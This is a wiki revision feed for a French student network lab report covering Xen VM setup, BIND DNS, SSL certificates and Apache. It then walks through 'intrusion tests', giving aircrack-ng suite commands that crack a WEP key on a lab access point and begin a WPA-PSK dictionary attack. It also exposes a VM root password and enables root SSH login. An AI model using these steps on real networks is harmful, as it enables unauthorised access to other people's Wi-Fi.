 ;&lt;br /&gt;
 ; BIND data file for local loopback interface&lt;br /&gt;
 ;&lt;br /&gt;
 $TTL    604800&lt;br /&gt;
 @       IN      SOA      ns1.karmeliet.site.  postmaster.karmeliet.site(&lt;br /&gt;
                              4         ; Serial&lt;br /&gt;
                         604800         ; Refresh&lt;br /&gt;
                          86400         ; Retry&lt;br /&gt;
                        2419200         ; Expire&lt;br /&gt;
                         604800 )       ; Negative Cache TTL&lt;br /&gt;
 ;&lt;br /&gt;
 @       IN      NS      ns1.karmeliet.site.&lt;br /&gt;
 @       IN      NS      ns6.gandi.net.&lt;br /&gt;
 ns1     IN      A       193.48.57.179&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==Certificat==&lt;br /&gt;
&lt;br /&gt;
Dans Gandi.net, on achète notre certificat en allant sur &lt;br /&gt;
 SSL certificate&lt;br /&gt;
&lt;br /&gt;
On nous demande une &amp;quot;Certificate Request&amp;quot; CSR que l'on a grâce à la commande &lt;br /&gt;
 openssl req -nodes -newkey rsa:2048 -sha256 -keyout myserver.key -out server.csr&lt;br /&gt;
&lt;br /&gt;
On remplit les différentes informations que l'on nous demande et on récupère notre csr dans server.csr à la fin de la commande.&lt;br /&gt;
&lt;br /&gt;
On va sur la page de notre certificat pour gandi et on copie colle comme ceci dans notre fichier db.karmeliet.site pour que notre certficat soit valide&lt;br /&gt;
&lt;br /&gt;
 ;&lt;br /&gt;
 ; BIND data file for local loopback interface&lt;br /&gt;
 ;&lt;br /&gt;
 $TTL    604800&lt;br /&gt;
 @       IN      SOA      ns1.karmeliet.site.  postmaster.karmeliet.site(&lt;br /&gt;
                              4         ; Serial&lt;br /&gt;
                         604800         ; Refresh&lt;br /&gt;
                          86400         ; Retry&lt;br /&gt;
                        2419200         ; Expire&lt;br /&gt;
                         604800 )       ; Negative Cache TTL&lt;br /&gt;
 ;&lt;br /&gt;
 @       IN      NS      ns1.karmeliet.site.&lt;br /&gt;
 @       IN      NS      ns6.gandi.net.&lt;br /&gt;
 ns1     IN      A       193.48.57.179&lt;br /&gt;
 www	IN	A	193.48.57.179&lt;br /&gt;
 _D83578361950694C7CBA2CF57DDA0CE7.karmeliet.site. 10800 IN CNAME BEF099045291643A940FA49D11E8FB10.4CCF28E6A180333498A3F008A8B6CB32.0e21313c9c6df2403142.sectigo.com.&lt;br /&gt;
&lt;br /&gt;
==Serveur apache==&lt;br /&gt;
&lt;br /&gt;
On installe un serveur apache pour vérifier que tout fonctionne&lt;br /&gt;
 apt install apache2&lt;br /&gt;
&lt;br /&gt;
Pour installer apache correctement on a suivi les instructions sur ce site&lt;br /&gt;
 https://ubuntu.com/tutorials/install-and-configure-apache#1-overview&lt;br /&gt;
&lt;br /&gt;
Puis on a modifié notre fichier de configuration apache se trouvant dans /etc/apache2/sites-available&lt;br /&gt;
pour y mettre notre certificat :&lt;br /&gt;
&lt;br /&gt;
 &amp;lt;VirtualHost *:80&amp;gt;&lt;br /&gt;
         ServerAdmin webmaster@localhost&lt;br /&gt;
         DocumentRoot /var/www/karmeliet.site&lt;br /&gt;
         ServerName karmeliet.site&lt;br /&gt;
         ServerAlias www.karmeliet.site&lt;br /&gt;
         Redirect permanent / https://karmeliet.site/&lt;br /&gt;
 &lt;br /&gt;
 &amp;lt;/VirtualHost&amp;gt; &lt;br /&gt;
 &lt;br /&gt;
 &amp;lt;VirtualHost *:443&amp;gt;&lt;br /&gt;
         ServerAdmin webmaster@localhost&lt;br /&gt;
         DocumentRoot /var/www/karmeliet.site&lt;br /&gt;
         ServerName karmeliet.site&lt;br /&gt;
         ServerAlias www.karmeliet.site &lt;br /&gt;
 &lt;br /&gt;
 &lt;br /&gt;
         SSLEngine on&lt;br /&gt;
         SSLCertificateFile /root/karmeliet.site.crt&lt;br /&gt;
         SSLCertificateKeyFile /root/karmeliet.site.key&lt;br /&gt;
 &lt;br /&gt;
         ErrorLog ${APACHE_LOG_DIR}/error.log&lt;br /&gt;
         CustomLog ${APACHE_LOG_DIR}/access.log combined&lt;br /&gt;
 &lt;br /&gt;
 &amp;lt;/VirtualHost&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==Sécurisation de serveur DNS par DNSSEC==&lt;br /&gt;
&lt;br /&gt;
= Tests d'intrusions =&lt;br /&gt;
&lt;br /&gt;
===5.2 Cassage de clef WEP d’un point d’accès WiFi ===&lt;br /&gt;
&lt;br /&gt;
Cette commande sert à récupérer le nom de l'interface réseau:&lt;br /&gt;
 airmon-ng&lt;br /&gt;
&lt;br /&gt;
Notre interface réseau s'appelle &amp;quot;wlan0mon&amp;quot; (renommé automatiquement parce que celui de base était trop long)&lt;br /&gt;
 &lt;br /&gt;
On démarre l'interface sur le channel 3 :&lt;br /&gt;
 airmon-ng start wlan0mon 3&lt;br /&gt;
&lt;br /&gt;
On récupère le BSSID du point d'accès sur lequel on veut récupérer la clé WEP&lt;br /&gt;
 airodump-ng wlan0mon &lt;br /&gt;
&lt;br /&gt;
On réalise un test d'injection sur cracotte10&lt;br /&gt;
 aireplay-ng -9 -e cracotte10 -a 04:DA:D2:9C:50:59 wlan0mon&lt;br /&gt;
&lt;br /&gt;
On récupère les VI générés par le point d'accès pour les stocker dans output :&lt;br /&gt;
 airodump-ng -c 3 --bssid 04:DA:D2:9C:50:59 -w output wlan0mon&lt;br /&gt;
&lt;br /&gt;
On effectue de fausses authentifications  &lt;br /&gt;
 aireplay-ng -1 0 -e cracotte10 -a 04:DA:D2:9C:50:59 -h 40:A5:EF:D2:11:67 wlan0mon&lt;br /&gt;
&lt;br /&gt;
La clef WEP est alors décriptable :&lt;br /&gt;
 aircrack-ng -b 04:DA:D2:9C:50:59 output*.cap&lt;br /&gt;
&lt;br /&gt;
Le résultat obtenu est le suivant :&lt;br /&gt;
 KEY FOUND! [ 55:55:55:55:5A:BC:11:CB:A4:44:44:44:44 ] &lt;br /&gt;
 Decrypted correctly: 100%&lt;br /&gt;
&lt;br /&gt;
===5.3  Cassage de mot de passe WPA-PSK par force brute ===&lt;br /&gt;
&lt;br /&gt;
Comme pour le cassage de la clé WEP, on utilise aircrack-ng:&lt;br /&gt;
&lt;br /&gt;
 airmon-ng&lt;br /&gt;
&lt;br /&gt;
On récupère le nom de notre interface qui est wlan0mon puis on le lance en mode moniteur sur le channel 7:&lt;br /&gt;
&lt;br /&gt;
 airmon-ng start wlan0mon 4&lt;br /&gt;
&lt;br /&gt;
Il nous faut un point d'accès pour pouvoir casser une clé WPA en récupérant son BSSID: &lt;br /&gt;
&lt;br /&gt;
 airodump-ng wlan0mon&lt;br /&gt;
&lt;br /&gt;
On choisit kracotte11 avec un BSSID 44:AD:D9:5F:87:0A, on récupère ce qu'on appelle &amp;quot;handshake&amp;quot; et on le sauvegarde dans un fichier sauv:&lt;br /&gt;
&lt;br /&gt;
 airodump-ng -c 4 --bssid 44:AD:D9:5F:87:0A -w sauv wlan0mon&lt;br /&gt;
&lt;br /&gt;
On peut commencer le crackage:&lt;br /&gt;
&lt;br /&gt;
 aircrack-ng sauv-01.cap -w dico.txt&lt;/div&gt;</summary>
		<author><name>Sbensale</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5_2021/2022_G4&amp;diff=57039</id>
		<title>TP sysres IMA5 2021/2022 G4</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5_2021/2022_G4&amp;diff=57039"/>
				<updated>2021-12-13T16:27:26Z</updated>
		
		<summary type="html">&lt;p&gt;Sbensale : /* Certificat */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;=Cablage Réseau=&lt;br /&gt;
&lt;br /&gt;
=Machine Virtuelle=&lt;br /&gt;
&lt;br /&gt;
==Création de la machine virtuelle==&lt;br /&gt;
&lt;br /&gt;
Commande pour la création de la machine virtuelle:&lt;br /&gt;
 root@capbreton:~$ xen-create-image --hostname=Karmeliet --ip=193.48.57.179 --gateway=193.48.57.187 --netmask=255.255.255.240 --dir=/usr/local/xen --password=glopglopglop --dist=bullseye&lt;br /&gt;
&lt;br /&gt;
On créé 2 LV de 10 Go pour les allouer plus tard mais pour cela nous devons d'abord voir quel volume groupe choisir (on choisit celui qui dispose du plus grand espace).&lt;br /&gt;
&lt;br /&gt;
 root@capbreton:~# vgdisplay&lt;br /&gt;
  --- Volume group ---&lt;br /&gt;
  VG Name               storage&lt;br /&gt;
  System ID             &lt;br /&gt;
  Format                lvm2&lt;br /&gt;
  Metadata Areas        2&lt;br /&gt;
  Metadata Sequence No  152&lt;br /&gt;
  VG Access             read/write&lt;br /&gt;
  VG Status             resizable&lt;br /&gt;
  MAX LV                0&lt;br /&gt;
  Cur LV                26&lt;br /&gt;
  Open LV               16&lt;br /&gt;
  Max PV                0&lt;br /&gt;
  Cur PV                2&lt;br /&gt;
  Act PV                2&lt;br /&gt;
  VG Size               &amp;lt;5.46 TiB&lt;br /&gt;
  PE Size               4.00 MiB&lt;br /&gt;
  Total PE              1430526&lt;br /&gt;
  Alloc PE / Size       50176 / 196.00 GiB&lt;br /&gt;
  Free  PE / Size       1380350 / &amp;lt;5.27 TiB&lt;br /&gt;
  VG UUID               eusQhE-lOxZ-cQqQ-uFxt-dYjG-LuwI-HL0flc&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 root@capbreton:~$ lvcreate -L10G -n Karmeliet1 storage&lt;br /&gt;
 root@capbreton:~$ lvcreate -L10G -n Karmeliet2 storage&lt;br /&gt;
&lt;br /&gt;
Il est nécessaire de les formater au format ext4 :&lt;br /&gt;
&lt;br /&gt;
 root@capbreton:~$ mkfs.ext4 /dev/storage/Karmeliet1&lt;br /&gt;
 root@capbreton:~$ mkfs.ext4 /dev/storage/Karmeliet2&lt;br /&gt;
&lt;br /&gt;
Dans notre fichier /etc/xen/Karmeliet.cfg, on doit indiquer que notre VM doit possèder les volumes logiques que l'on a créé auparavant (Karmeliet1 et Karmeliet2).&lt;br /&gt;
Il est, également, nécessaire d'indiquer le bridge IMA5sc.&lt;br /&gt;
&lt;br /&gt;
 root@capbreton:~$ vim /etc/xen/Karmeliet.cfg&lt;br /&gt;
 #Disk device(s).&lt;br /&gt;
 #&lt;br /&gt;
 root        = '/dev/xvda2 ro'&lt;br /&gt;
 disk        = [&lt;br /&gt;
                  'file:/usr/local/xen/domains/Karmeliet/disk.img,xvda2,w',&lt;br /&gt;
                  'file:/usr/local/xen/domains/Karmeliet/swap.img,xvda1,w',&lt;br /&gt;
                  'phy:/dev/storage/Karmeliet1,xvda3,w',&lt;br /&gt;
                  'phy:/dev/storage/Karmeliet2,xvda4,w'&lt;br /&gt;
              ]&lt;br /&gt;
 #Networking&lt;br /&gt;
 #&lt;br /&gt;
 vif         = [ 'ip=193.48.57.179 ,mac=00:16:3E:5E:59:17 ,bridge=IMA5sc' ]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
On lance la machine virtuelle :&lt;br /&gt;
&lt;br /&gt;
 root@capbreton:~$ xl create -c /etc/xen/Karmeliet.cfg&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
On doit créer xvda3 et xvda4 pour nos répertoires var et home:&lt;br /&gt;
&lt;br /&gt;
 root@Karmeliet:~$ mkdir /mnt/xvda3&lt;br /&gt;
 root@Karmeliet:~$ mkdir /mnt/xvda4&lt;br /&gt;
 root@Karmeliet:~$ mount /dev/xvda3 /mnt/xvda3&lt;br /&gt;
 root@Karmeliet:~$ mount /dev/xvda4 /mnt/xvda4&lt;br /&gt;
&lt;br /&gt;
Le répertoire var doit être placé dans le disque xvda4 :&lt;br /&gt;
&lt;br /&gt;
 root@Karmeliet:~$ mv /var/* /mnt/xvda4&lt;br /&gt;
&lt;br /&gt;
Dans le fichier /etc/fstab, il est nécesaire d'ajouter les lignes ci-dessous pour pouvoir monter les disques par la suite:&lt;br /&gt;
&lt;br /&gt;
 root@Karmeliet:~$ /dev/xvda3 /home ext4 defaults 0 2&lt;br /&gt;
 root@Karmeliet:~$ /dev/xvda4 /var ext4 defaults 0 2&lt;br /&gt;
&lt;br /&gt;
La commande suivant permet de monter les disques :&lt;br /&gt;
&lt;br /&gt;
 root@Karmeliet:~$ mount -a&lt;br /&gt;
&lt;br /&gt;
Pour vérifier que le montage s'est faite correctement, on peut voir avec la commande lsblk si les partitions sont bien visibles :&lt;br /&gt;
&lt;br /&gt;
 root@Karmeliet:~$ lsblk&lt;br /&gt;
 NAME  MAJ:MIN RM  SIZE RO TYPE MOUNTPOINT&lt;br /&gt;
 xvda1 202:1    0  512M  0 disk [SWAP]&lt;br /&gt;
 xvda2 202:2    0    4G  0 disk /&lt;br /&gt;
 xvda3 202:3    0   10G  0 disk /home&lt;br /&gt;
 xvda4 202:4    0   10G  0 disk /var&lt;br /&gt;
&lt;br /&gt;
Pour accéder à notre VM :&lt;br /&gt;
&lt;br /&gt;
 root@capbreton:~# xen console Karmeliet&lt;br /&gt;
&lt;br /&gt;
=Services Internet=&lt;br /&gt;
==Connexion ssh==&lt;br /&gt;
&lt;br /&gt;
Pour se connecter en ssh, nous allons dans le fichier se trouvant au chemin :&lt;br /&gt;
 /etc/ssh/sshd_config&lt;br /&gt;
&lt;br /&gt;
On décommente Port et PermitRootLogin et on leur donne la valeur :&lt;br /&gt;
&lt;br /&gt;
 Port 22222&lt;br /&gt;
 PermitRootLogin Yes&lt;br /&gt;
&lt;br /&gt;
On a plus qu'à se connecter via ssh  : &lt;br /&gt;
 ssh root@193.48.57.179 -p 22222&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==DNS==&lt;br /&gt;
&lt;br /&gt;
On réserve un nom de domaine sur ghandi.net, en l'occurrence le notre sera : &lt;br /&gt;
 karmeliet.site&lt;br /&gt;
&lt;br /&gt;
On rentre notre adresse IPv4 dans le &amp;quot;Glue records&amp;quot;&lt;br /&gt;
 193.48.57.179&lt;br /&gt;
&lt;br /&gt;
On ajoute nos DNS primaire et secondaire pour obtenir un nom de serveur&lt;br /&gt;
 ns1.karmeliet.site (primaire)&lt;br /&gt;
 ns6.gandi.net (secondaire)&lt;br /&gt;
&lt;br /&gt;
===Configuration de bind9===&lt;br /&gt;
&lt;br /&gt;
On installe les paquets&lt;br /&gt;
 apt install bind9&lt;br /&gt;
&lt;br /&gt;
On change le fichier /etc/resolv.conf&lt;br /&gt;
 nameserver 127.0.0.1&lt;br /&gt;
&lt;br /&gt;
On va configurer notre DNS primaire dans le fichier de configuration /etc/bind/named.conf.local&lt;br /&gt;
De plus, on autorise le transfert d'information avec le DNS Secondaire (217.70.177.40)&lt;br /&gt;
 zone &amp;quot;karmeliet.site&amp;quot; {&lt;br /&gt;
   type master;&lt;br /&gt;
   file &amp;quot;/etc/bind/db.karmeliet.site&amp;quot;;&lt;br /&gt;
   allow-transfer { 217.70.177.40; };&lt;br /&gt;
 };&lt;br /&gt;
&lt;br /&gt;
On créé un fichier db.karmeliet.site ayant le même template que db.local &lt;br /&gt;
&lt;br /&gt;
 ;&lt;br /&gt;
 ; BIND data file for local loopback interface&lt;br /&gt;
 ;&lt;br /&gt;
 $TTL    604800&lt;br /&gt;
 @       IN      SOA      ns1.karmeliet.site.  postmaster.karmeliet.site(&lt;br /&gt;
                              4         ; Serial&lt;br /&gt;
                         604800         ; Refresh&lt;br /&gt;
                          86400         ; Retry&lt;br /&gt;
                        2419200         ; Expire&lt;br /&gt;
                         604800 )       ; Negative Cache TTL&lt;br /&gt;
 ;&lt;br /&gt;
 @       IN      NS      ns1.karmeliet.site.&lt;br /&gt;
 @       IN      NS      ns6.gandi.net.&lt;br /&gt;
 ns1     IN      A       193.48.57.179&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==Certificat==&lt;br /&gt;
&lt;br /&gt;
Dans Gandi.net, on achète notre certificat en allant sur &lt;br /&gt;
 SSL certificate&lt;br /&gt;
&lt;br /&gt;
On nous demande une &amp;quot;Certificate Request&amp;quot; CSR que l'on a grâce à la commande &lt;br /&gt;
 openssl req -nodes -newkey rsa:2048 -sha256 -keyout myserver.key -out server.csr&lt;br /&gt;
&lt;br /&gt;
On remplit les différentes informations que l'on nous demande et on récupère notre csr dans server.csr à la fin de la commande.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==Serveur apache==&lt;br /&gt;
&lt;br /&gt;
On installe un serveur apache pour vérifier que tout fonctionne&lt;br /&gt;
 apt install apache2&lt;br /&gt;
&lt;br /&gt;
= Tests d'intrusions =&lt;br /&gt;
&lt;br /&gt;
===5.2 Cassage de clef WEP d’un point d’accès WiFi ===&lt;br /&gt;
&lt;br /&gt;
Cette commande sert à récupérer le nom de l'interface réseau:&lt;br /&gt;
 airmon-ng&lt;br /&gt;
&lt;br /&gt;
Notre interface réseau s'appelle &amp;quot;wlan0mon&amp;quot; (renommé automatiquement parce que celui de base était trop long)&lt;br /&gt;
 &lt;br /&gt;
On démarre l'interface sur le channel 3 :&lt;br /&gt;
 airmon-ng start wlan0mon 3&lt;br /&gt;
&lt;br /&gt;
On récupère le BSSID du point d'accès sur lequel on veut récupérer la clé WEP&lt;br /&gt;
 airodump-ng wlan0mon &lt;br /&gt;
&lt;br /&gt;
On réalise un test d'injection sur cracotte10&lt;br /&gt;
 aireplay-ng -9 -e cracotte10 -a 04:DA:D2:9C:50:59 wlan0mon&lt;br /&gt;
&lt;br /&gt;
On récupère les VI générés par le point d'accès pour les stocker dans output :&lt;br /&gt;
 airodump-ng -c 3 --bssid 04:DA:D2:9C:50:59 -w output wlan0mon&lt;br /&gt;
&lt;br /&gt;
On effectue de fausses authentifications  &lt;br /&gt;
 aireplay-ng -1 0 -e cracotte10 -a 04:DA:D2:9C:50:59 -h 40:A5:EF:D2:11:67 wlan0mon&lt;br /&gt;
&lt;br /&gt;
La clef WEP est alors décriptable :&lt;br /&gt;
 aircrack-ng -b 04:DA:D2:9C:50:59 output*.cap&lt;br /&gt;
&lt;br /&gt;
Le résultat obtenu est le suivant :&lt;br /&gt;
 KEY FOUND! [ 55:55:55:55:5A:BC:11:CB:A4:44:44:44:44 ] &lt;br /&gt;
 Decrypted correctly: 100%&lt;br /&gt;
&lt;br /&gt;
===5.3  Cassage de mot de passe WPA-PSK par force brute ===&lt;br /&gt;
&lt;br /&gt;
Comme pour le cassage de la clé WEP, on utilise aircrack-ng:&lt;br /&gt;
&lt;br /&gt;
 airmon-ng&lt;br /&gt;
&lt;br /&gt;
On récupère le nom de notre interface qui est wlan0mon puis on le lance en mode moniteur sur le channel 7:&lt;br /&gt;
&lt;br /&gt;
 airmon-ng start wlan0mon 4&lt;br /&gt;
&lt;br /&gt;
Il nous faut un point d'accès pour pouvoir casser une clé WPA en récupérant son BSSID: &lt;br /&gt;
&lt;br /&gt;
 airodump-ng wlan0mon&lt;br /&gt;
&lt;br /&gt;
On choisit kracotte11 avec un BSSID 44:AD:D9:5F:87:0A, on récupère ce qu'on appelle &amp;quot;handshake&amp;quot; et on le sauvegarde dans un fichier sauv:&lt;br /&gt;
&lt;br /&gt;
 airodump-ng -c 4 --bssid 44:AD:D9:5F:87:0A -w sauv wlan0mon&lt;br /&gt;
&lt;br /&gt;
On peut commencer le crackage:&lt;br /&gt;
&lt;br /&gt;
 aircrack-ng sauv-01.cap -w dico.txt&lt;/div&gt;</summary>
		<author><name>Sbensale</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5_2021/2022_G4&amp;diff=57032</id>
		<title>TP sysres IMA5 2021/2022 G4</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5_2021/2022_G4&amp;diff=57032"/>
				<updated>2021-12-13T16:21:53Z</updated>
		
		<summary type="html">&lt;p&gt;Sbensale : /* Configuration de bind9 */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;=Cablage Réseau=&lt;br /&gt;
&lt;br /&gt;
=Machine Virtuelle=&lt;br /&gt;
&lt;br /&gt;
==Création de la machine virtuelle==&lt;br /&gt;
&lt;br /&gt;
Commande pour la création de la machine virtuelle:&lt;br /&gt;
 root@capbreton:~$ xen-create-image --hostname=Karmeliet --ip=193.48.57.179 --gateway=193.48.57.187 --netmask=255.255.255.240 --dir=/usr/local/xen --password=glopglopglop --dist=bullseye&lt;br /&gt;
&lt;br /&gt;
On créé 2 LV de 10 Go pour les allouer plus tard mais pour cela nous devons d'abord voir quel volume groupe choisir (on choisit celui qui dispose du plus grand espace).&lt;br /&gt;
&lt;br /&gt;
 root@capbreton:~# vgdisplay&lt;br /&gt;
  --- Volume group ---&lt;br /&gt;
  VG Name               storage&lt;br /&gt;
  System ID             &lt;br /&gt;
  Format                lvm2&lt;br /&gt;
  Metadata Areas        2&lt;br /&gt;
  Metadata Sequence No  152&lt;br /&gt;
  VG Access             read/write&lt;br /&gt;
  VG Status             resizable&lt;br /&gt;
  MAX LV                0&lt;br /&gt;
  Cur LV                26&lt;br /&gt;
  Open LV               16&lt;br /&gt;
  Max PV                0&lt;br /&gt;
  Cur PV                2&lt;br /&gt;
  Act PV                2&lt;br /&gt;
  VG Size               &amp;lt;5.46 TiB&lt;br /&gt;
  PE Size               4.00 MiB&lt;br /&gt;
  Total PE              1430526&lt;br /&gt;
  Alloc PE / Size       50176 / 196.00 GiB&lt;br /&gt;
  Free  PE / Size       1380350 / &amp;lt;5.27 TiB&lt;br /&gt;
  VG UUID               eusQhE-lOxZ-cQqQ-uFxt-dYjG-LuwI-HL0flc&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 root@capbreton:~$ lvcreate -L10G -n Karmeliet1 storage&lt;br /&gt;
 root@capbreton:~$ lvcreate -L10G -n Karmeliet2 storage&lt;br /&gt;
&lt;br /&gt;
Il est nécessaire de les formater au format ext4 :&lt;br /&gt;
&lt;br /&gt;
 root@capbreton:~$ mkfs.ext4 /dev/storage/Karmeliet1&lt;br /&gt;
 root@capbreton:~$ mkfs.ext4 /dev/storage/Karmeliet2&lt;br /&gt;
&lt;br /&gt;
Dans notre fichier /etc/xen/Karmeliet.cfg, on doit indiquer que notre VM doit possèder les volumes logiques que l'on a créé auparavant (Karmeliet1 et Karmeliet2).&lt;br /&gt;
Il est, également, nécessaire d'indiquer le bridge IMA5sc.&lt;br /&gt;
&lt;br /&gt;
 root@capbreton:~$ vim /etc/xen/Karmeliet.cfg&lt;br /&gt;
 #Disk device(s).&lt;br /&gt;
 #&lt;br /&gt;
 root        = '/dev/xvda2 ro'&lt;br /&gt;
 disk        = [&lt;br /&gt;
                  'file:/usr/local/xen/domains/Karmeliet/disk.img,xvda2,w',&lt;br /&gt;
                  'file:/usr/local/xen/domains/Karmeliet/swap.img,xvda1,w',&lt;br /&gt;
                  'phy:/dev/storage/Karmeliet1,xvda3,w',&lt;br /&gt;
                  'phy:/dev/storage/Karmeliet2,xvda4,w'&lt;br /&gt;
              ]&lt;br /&gt;
 #Networking&lt;br /&gt;
 #&lt;br /&gt;
 vif         = [ 'ip=193.48.57.179 ,mac=00:16:3E:5E:59:17 ,bridge=IMA5sc' ]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
On lance la machine virtuelle :&lt;br /&gt;
&lt;br /&gt;
 root@capbreton:~$ xl create -c /etc/xen/Karmeliet.cfg&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
On doit créer xvda3 et xvda4 pour nos répertoires var et home:&lt;br /&gt;
&lt;br /&gt;
 root@Karmeliet:~$ mkdir /mnt/xvda3&lt;br /&gt;
 root@Karmeliet:~$ mkdir /mnt/xvda4&lt;br /&gt;
 root@Karmeliet:~$ mount /dev/xvda3 /mnt/xvda3&lt;br /&gt;
 root@Karmeliet:~$ mount /dev/xvda4 /mnt/xvda4&lt;br /&gt;
&lt;br /&gt;
Le répertoire var doit être placé dans le disque xvda4 :&lt;br /&gt;
&lt;br /&gt;
 root@Karmeliet:~$ mv /var/* /mnt/xvda4&lt;br /&gt;
&lt;br /&gt;
Dans le fichier /etc/fstab, il est nécesaire d'ajouter les lignes ci-dessous pour pouvoir monter les disques par la suite:&lt;br /&gt;
&lt;br /&gt;
 root@Karmeliet:~$ /dev/xvda3 /home ext4 defaults 0 2&lt;br /&gt;
 root@Karmeliet:~$ /dev/xvda4 /var ext4 defaults 0 2&lt;br /&gt;
&lt;br /&gt;
La commande suivant permet de monter les disques :&lt;br /&gt;
&lt;br /&gt;
 root@Karmeliet:~$ mount -a&lt;br /&gt;
&lt;br /&gt;
Pour vérifier que le montage s'est faite correctement, on peut voir avec la commande lsblk si les partitions sont bien visibles :&lt;br /&gt;
&lt;br /&gt;
 root@Karmeliet:~$ lsblk&lt;br /&gt;
 NAME  MAJ:MIN RM  SIZE RO TYPE MOUNTPOINT&lt;br /&gt;
 xvda1 202:1    0  512M  0 disk [SWAP]&lt;br /&gt;
 xvda2 202:2    0    4G  0 disk /&lt;br /&gt;
 xvda3 202:3    0   10G  0 disk /home&lt;br /&gt;
 xvda4 202:4    0   10G  0 disk /var&lt;br /&gt;
&lt;br /&gt;
Pour accéder à notre VM :&lt;br /&gt;
&lt;br /&gt;
 root@capbreton:~# xen console Karmeliet&lt;br /&gt;
&lt;br /&gt;
=Services Internet=&lt;br /&gt;
==Connexion ssh==&lt;br /&gt;
&lt;br /&gt;
Pour se connecter en ssh, nous allons dans le fichier se trouvant au chemin :&lt;br /&gt;
 /etc/ssh/sshd_config&lt;br /&gt;
&lt;br /&gt;
On décommente Port et PermitRootLogin et on leur donne la valeur :&lt;br /&gt;
&lt;br /&gt;
 Port 22222&lt;br /&gt;
 PermitRootLogin Yes&lt;br /&gt;
&lt;br /&gt;
On a plus qu'à se connecter via ssh  : &lt;br /&gt;
 ssh root@193.48.57.179 -p 22222&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==DNS==&lt;br /&gt;
&lt;br /&gt;
On réserve un nom de domaine sur ghandi.net, en l'occurrence le notre sera : &lt;br /&gt;
 karmeliet.site&lt;br /&gt;
&lt;br /&gt;
On rentre notre adresse IPv4 dans le &amp;quot;Glue records&amp;quot;&lt;br /&gt;
 193.48.57.179&lt;br /&gt;
&lt;br /&gt;
On ajoute nos DNS primaire et secondaire pour obtenir un nom de serveur&lt;br /&gt;
 ns1.karmeliet.site (primaire)&lt;br /&gt;
 ns6.gandi.net (secondaire)&lt;br /&gt;
&lt;br /&gt;
===Configuration de bind9===&lt;br /&gt;
&lt;br /&gt;
On installe les paquets&lt;br /&gt;
 apt install bind9&lt;br /&gt;
&lt;br /&gt;
On change le fichier /etc/resolv.conf&lt;br /&gt;
 nameserver 127.0.0.1&lt;br /&gt;
&lt;br /&gt;
On va configurer notre DNS primaire dans le fichier de configuration /etc/bind/named.conf.local&lt;br /&gt;
De plus, on autorise le transfert d'information avec le DNS Secondaire (217.70.177.40)&lt;br /&gt;
 zone &amp;quot;karmeliet.site&amp;quot; {&lt;br /&gt;
   type master;&lt;br /&gt;
   file &amp;quot;/etc/bind/db.karmeliet.site&amp;quot;;&lt;br /&gt;
   allow-transfer { 217.70.177.40; };&lt;br /&gt;
 };&lt;br /&gt;
&lt;br /&gt;
On créé un fichier db.karmeliet.site ayant le même template que db.local &lt;br /&gt;
&lt;br /&gt;
 ;&lt;br /&gt;
 ; BIND data file for local loopback interface&lt;br /&gt;
 ;&lt;br /&gt;
 $TTL    604800&lt;br /&gt;
 @       IN      SOA      ns1.karmeliet.site.  postmaster.karmeliet.site(&lt;br /&gt;
                              4         ; Serial&lt;br /&gt;
                         604800         ; Refresh&lt;br /&gt;
                          86400         ; Retry&lt;br /&gt;
                        2419200         ; Expire&lt;br /&gt;
                         604800 )       ; Negative Cache TTL&lt;br /&gt;
 ;&lt;br /&gt;
 @       IN      NS      ns1.karmeliet.site.&lt;br /&gt;
 @       IN      NS      ns6.gandi.net.&lt;br /&gt;
 ns1     IN      A       193.48.57.179&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==Certificat==&lt;br /&gt;
&lt;br /&gt;
= Tests d'intrusions =&lt;br /&gt;
&lt;br /&gt;
===5.2 Cassage de clef WEP d’un point d’accès WiFi ===&lt;br /&gt;
&lt;br /&gt;
Cette commande sert à récupérer le nom de l'interface réseau:&lt;br /&gt;
 airmon-ng&lt;br /&gt;
&lt;br /&gt;
Notre interface réseau s'appelle &amp;quot;wlan0mon&amp;quot; (renommé automatiquement parce que celui de base était trop long)&lt;br /&gt;
 &lt;br /&gt;
On démarre l'interface sur le channel 3 :&lt;br /&gt;
 airmon-ng start wlan0mon 3&lt;br /&gt;
&lt;br /&gt;
On récupère le BSSID du point d'accès sur lequel on veut récupérer la clé WEP&lt;br /&gt;
 airodump-ng wlan0mon &lt;br /&gt;
&lt;br /&gt;
On réalise un test d'injection sur cracotte10&lt;br /&gt;
 aireplay-ng -9 -e cracotte10 -a 04:DA:D2:9C:50:59 wlan0mon&lt;br /&gt;
&lt;br /&gt;
On récupère les VI générés par le point d'accès pour les stocker dans output :&lt;br /&gt;
 airodump-ng -c 3 --bssid 04:DA:D2:9C:50:59 -w output wlan0mon&lt;br /&gt;
&lt;br /&gt;
On effectue de fausses authentifications  &lt;br /&gt;
 aireplay-ng -1 0 -e cracotte10 -a 04:DA:D2:9C:50:59 -h 40:A5:EF:D2:11:67 wlan0mon&lt;br /&gt;
&lt;br /&gt;
La clef WEP est alors décriptable :&lt;br /&gt;
 aircrack-ng -b 04:DA:D2:9C:50:59 output*.cap&lt;br /&gt;
&lt;br /&gt;
Le résultat obtenu est le suivant :&lt;br /&gt;
